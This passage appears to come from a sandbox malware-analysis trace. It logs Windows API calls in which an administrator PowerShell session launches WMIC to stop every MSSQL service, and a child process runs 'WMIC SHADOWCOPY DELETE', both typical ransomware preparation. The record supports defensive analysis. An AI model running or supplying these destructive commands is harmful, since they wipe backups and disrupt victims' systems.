dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0203.311] SetErrorMode (uMode=0x1) returned 0x1 [0203.312] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bd660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0203.312] SetErrorMode (uMode=0x1) returned 0x1 [0203.312] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.EXE", lpFindFileData=0x1c7bd800 | out: lpFindFileData=0x1c7bd800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0203.312] SetErrorMode (uMode=0x1) returned 0x1 [0203.312] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bd660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0203.313] SetErrorMode (uMode=0x1) returned 0x1 [0203.313] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.BAT", lpFindFileData=0x1c7bd800 | out: lpFindFileData=0x1c7bd800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0203.313] SetErrorMode (uMode=0x1) returned 0x1 [0203.313] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bd660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0203.313] SetErrorMode (uMode=0x1) returned 0x1 [0203.313] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.CMD", lpFindFileData=0x1c7bd800 | out: lpFindFileData=0x1c7bd800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0203.314] SetErrorMode (uMode=0x1) returned 0x1 [0203.314] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bd660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0203.314] SetErrorMode (uMode=0x1) returned 0x1 [0203.314] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.VBS", lpFindFileData=0x1c7bd800 | out: lpFindFileData=0x1c7bd800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0203.314] SetErrorMode (uMode=0x1) returned 0x1 [0203.314] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bd660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0203.315] SetErrorMode (uMode=0x1) returned 0x1 [0203.315] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.VBE", lpFindFileData=0x1c7bd800 | out: lpFindFileData=0x1c7bd800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0203.315] SetErrorMode (uMode=0x1) returned 0x1 [0203.315] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bd660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0203.315] SetErrorMode (uMode=0x1) returned 0x1 [0203.315] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.JS", lpFindFileData=0x1c7bd800 | out: lpFindFileData=0x1c7bd800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0203.316] SetErrorMode (uMode=0x1) returned 0x1 [0203.316] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bd660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0203.316] SetErrorMode (uMode=0x1) returned 0x1 [0203.316] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.JSE", lpFindFileData=0x1c7bd800 | out: lpFindFileData=0x1c7bd800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0203.316] SetErrorMode (uMode=0x1) returned 0x1 [0203.316] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bd660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0203.317] SetErrorMode (uMode=0x1) returned 0x1 [0203.317] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.WSF", lpFindFileData=0x1c7bd800 | out: lpFindFileData=0x1c7bd800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0203.317] SetErrorMode (uMode=0x1) returned 0x1 [0203.317] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bd660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0203.317] SetErrorMode (uMode=0x1) returned 0x1 [0203.317] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.WSH", lpFindFileData=0x1c7bd800 | out: lpFindFileData=0x1c7bd800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0203.317] SetErrorMode (uMode=0x1) returned 0x1 [0203.318] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bd660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0203.318] SetErrorMode (uMode=0x1) returned 0x1 [0203.318] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.MSC", lpFindFileData=0x1c7bd800 | out: lpFindFileData=0x1c7bd800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0203.318] SetErrorMode (uMode=0x1) returned 0x1 [0203.318] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bd660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0203.318] SetErrorMode (uMode=0x1) returned 0x1 [0203.319] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic", lpFindFileData=0x1c7bd800 | out: lpFindFileData=0x1c7bd800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0203.319] SetErrorMode (uMode=0x1) returned 0x1 [0203.319] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7bd660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0203.319] SetErrorMode (uMode=0x1) returned 0x1 [0203.319] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.ps1", lpFindFileData=0x1c7bd800 | out: lpFindFileData=0x1c7bd800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0203.319] SetErrorMode (uMode=0x1) returned 0x1 [0203.320] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7bd660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0203.320] SetErrorMode (uMode=0x1) returned 0x1 [0203.320] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.psm1", lpFindFileData=0x1c7bd800 | out: lpFindFileData=0x1c7bd800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0203.320] SetErrorMode (uMode=0x1) returned 0x1 [0203.320] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7bd660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0203.320] SetErrorMode (uMode=0x1) returned 0x1 [0203.321] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.psd1", lpFindFileData=0x1c7bd800 | out: lpFindFileData=0x1c7bd800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0203.321] SetErrorMode (uMode=0x1) returned 0x1 [0203.321] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7bd660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0203.321] SetErrorMode (uMode=0x1) returned 0x1 [0203.321] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.COM", lpFindFileData=0x1c7bd800 | out: lpFindFileData=0x1c7bd800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0203.322] SetErrorMode (uMode=0x1) returned 0x1 [0203.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7bd660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0203.322] SetErrorMode (uMode=0x1) returned 0x1 [0203.322] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.EXE", lpFindFileData=0x1c7bd800 | out: lpFindFileData=0x1c7bd800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0x2666a0 [0203.322] FindNextFileW (in: hFindFile=0x2666a0, lpFindFileData=0x1c7bd810 | out: lpFindFileData=0x1c7bd810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0 [0203.323] FindClose (in: hFindFile=0x2666a0 | out: hFindFile=0x2666a0) returned 1 [0203.323] SetErrorMode (uMode=0x1) returned 0x1 [0203.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.exe", nBufferLength=0x105, lpBuffer=0x1c7bd920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpFilePart=0x0) returned 0x21 [0203.323] SetErrorMode (uMode=0x1) returned 0x1 [0203.323] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c7bdb30 | out: lpFileInformation=0x1c7bdb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400)) returned 1 [0203.323] SetErrorMode (uMode=0x1) returned 0x1 [0203.324] CoTaskMemAlloc (cb=0x23) returned 0x1b851e90 [0203.324] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x1c7bdd18, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c7bdd18) returned 0x4550 [0203.325] CoTaskMemFree (pv=0x1b851e90) [0203.325] GetConsoleWindow () returned 0x40270 [0203.327] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0203.327] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0203.327] CoTaskMemFree (pv=0x2e4780) [0203.328] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0203.328] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0203.328] CoTaskMemFree (pv=0x2e4780) [0203.328] CommandLineToArgvW (in: lpCmdLine=" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice", pNumArgs=0x1c7bdd60 | out: pNumArgs=0x1c7bdd60) returned 0x23e760*="" [0203.328] lstrlenW (lpString="path") returned 4 [0203.328] CoTaskMemAlloc (cb=0xc) returned 0x274830 [0203.328] RtlMoveMemory (in: Destination=0x274830, Source=0x23e7a2, Length=0xa | out: Destination=0x274830) [0203.328] CoTaskMemFree (pv=0x274830) [0203.328] lstrlenW (lpString="Win32_Service") returned 13 [0203.328] CoTaskMemAlloc (cb=0x1e) returned 0x1b851e90 [0203.328] RtlMoveMemory (in: Destination=0x1b851e90, Source=0x23e7ac, Length=0x1c | out: Destination=0x1b851e90) [0203.328] CoTaskMemFree (pv=0x1b851e90) [0203.328] lstrlenW (lpString="where") returned 5 [0203.328] CoTaskMemAlloc (cb=0xe) returned 0x274830 [0203.328] RtlMoveMemory (in: Destination=0x274830, Source=0x23e7c8, Length=0xc | out: Destination=0x274830) [0203.328] CoTaskMemFree (pv=0x274830) [0203.328] lstrlenW (lpString="name like '%%MSSQL%%'") returned 21 [0203.328] CoTaskMemAlloc (cb=0x2e) returned 0x1b85bb20 [0203.328] RtlMoveMemory (in: Destination=0x1b85bb20, Source=0x23e7d4, Length=0x2c | out: Destination=0x1b85bb20) [0203.328] CoTaskMemFree (pv=0x1b85bb20) [0203.328] lstrlenW (lpString="call") returned 4 [0203.328] CoTaskMemAlloc (cb=0xc) returned 0x274830 [0203.328] RtlMoveMemory (in: Destination=0x274830, Source=0x23e800, Length=0xa | out: Destination=0x274830) [0203.329] CoTaskMemFree (pv=0x274830) [0203.329] lstrlenW (lpString="stopservice") returned 11 [0203.329] CoTaskMemAlloc (cb=0x1a) returned 0x1b851e90 [0203.329] RtlMoveMemory (in: Destination=0x1b851e90, Source=0x23e80a, Length=0x18 | out: Destination=0x1b851e90) [0203.329] CoTaskMemFree (pv=0x1b851e90) [0203.329] LocalFree (hMem=0x23e760) returned 0x0 [0203.329] CoTaskMemAlloc (cb=0x804) returned 0x1b8666a0 [0203.329] GetConsoleTitleW (in: lpConsoleTitle=0x1b8666a0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48 [0203.329] CoTaskMemFree (pv=0x1b8666a0) [0203.330] CoTaskMemAlloc (cb=0x114) returned 0x2a1380 [0203.330] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1c7bdcc0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x301a040 | out: lpCommandLine="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice", lpProcessInformation=0x301a040*(hProcess=0x4b4, hThread=0x4b0, dwProcessId=0x6ec, dwThreadId=0x2ac)) returned 1 [0203.335] CoTaskMemFree (pv=0x2a1380) [0203.335] CloseHandle (hObject=0x4b0) returned 1 [0203.335] CoTaskMemAlloc (cb=0x23) returned 0x1b851e90 [0203.335] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x1c7bdd68, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c7bdd68) returned 0x4550 [0203.336] CoTaskMemFree (pv=0x1b851e90) [0203.336] GetCurrentProcess () returned 0xffffffffffffffff [0203.336] GetCurrentProcess () returned 0xffffffffffffffff [0203.336] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x4b4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c7bde48, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c7bde48*=0x4b0) returned 1 Process: id = "5" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x7389c000" os_pid = "0xb50" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0xa08" cmd_line = "\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" SHADOWCOPY DELETE" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 26 os_tid = 0xb10 [0094.387] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfe70 | out: lpSystemTimeAsFileTime=0x1cfe70*(dwLowDateTime=0xa1a28790, dwHighDateTime=0x1d62524)) [0094.387] GetCurrentProcessId () returned 0xb50 [0094.387] GetCurrentThreadId () returned 0xb10 [0094.387] GetTickCount () returned 0x114f6dd [0094.387] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfe78 | out: lpPerformanceCount=0x1cfe78*=21472975412) returned 1 [0094.389] GetModuleHandleW (lpModuleName=0x0) returned 0xff160000 [0094.389] __set_app_type (_Type=0x1) [0094.389] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff1aced0) returned 0x0 [0094.390] __wgetmainargs (in: _Argc=0xff1d2380, _Argv=0xff1d2390, _Env=0xff1d2388, _DoWildCard=0, _StartInfo=0xff1d239c | out: _Argc=0xff1d2380, _Argv=0xff1d2390, _Env=0xff1d2388) returned 0 [0094.392] ??0CHString@@QEAA@XZ () returned 0xff1d2ab0 [0094.395] malloc (_Size=0x30) returned 0x285a80 [0094.396] malloc (_Size=0x70) returned 0x287c00 [0094.396] malloc (_Size=0x50) returned 0x285ac0 [0094.396] malloc (_Size=0x30) returned 0x287c80 [0094.396] malloc (_Size=0x48) returned 0x287cc0 [0094.396] malloc (_Size=0x30) returned 0x287d10 [0094.396] malloc (_Size=0x30) returned 0x287d50 [0094.396] ??0CHString@@QEAA@XZ () returned 0xff1d2f58 [0094.396] malloc (_Size=0x30) returned 0x287d90 [0094.396] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0094.396] SetConsoleCtrlHandler (HandlerRoutine=0xff1a5724, Add=1) returned 1 [0094.396] _onexit (_Func=0xff1bf378) returned 0xff1bf378 [0094.397] _onexit (_Func=0xff1bf490) returned 0xff1bf490 [0094.397] _onexit (_Func=0xff1bf4d0) returned 0xff1bf4d0 [0094.397] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0094.397] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0094.404] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0094.421] CoCreateInstance (in: rclsid=0xff1673a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff167370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xff1d2940 | out: ppv=0xff1d2940*=0x1da1390) returned 0x0 [0094.833] GetCurrentProcess () returned 0xffffffffffffffff [0094.833] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x1cfc40 | out: TokenHandle=0x1cfc40*=0xf4) returned 1 [0094.833] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1cfc38 | out: TokenInformation=0x0, ReturnLength=0x1cfc38) returned 0 [0094.833] malloc (_Size=0x118) returned 0x2866d0 [0094.833] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x2866d0, TokenInformationLength=0x118, ReturnLength=0x1cfc38 | out: TokenInformation=0x2866d0, ReturnLength=0x1cfc38) returned 1 [0094.833] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x2866d0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=844146693, Attributes=0x88ad), (Luid.LowPart=0x0, Luid.HighPart=2653920, Attributes=0x0), (Luid.LowPart=0x610044, Luid.HighPart=6357108, Attributes=0x4c005c), (Luid.LowPart=0x6c0061, Luid.HighPart=4980736, Attributes=0x47004f), (Luid.LowPart=0x450053, Luid.HighPart=5636178, Attributes=0x520045), (Luid.LowPart=0x58005c, Luid.HighPart=5570628, Attributes=0x540057))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0094.833] free (_Block=0x2866d0) [0094.833] CloseHandle (hObject=0xf4) returned 1 [0094.834] malloc (_Size=0x40) returned 0x287ee0 [0094.834] malloc (_Size=0x40) returned 0x287f30 [0094.834] malloc (_Size=0x40) returned 0x287f80 [0094.834] malloc (_Size=0x20a) returned 0x2866d0 [0094.834] 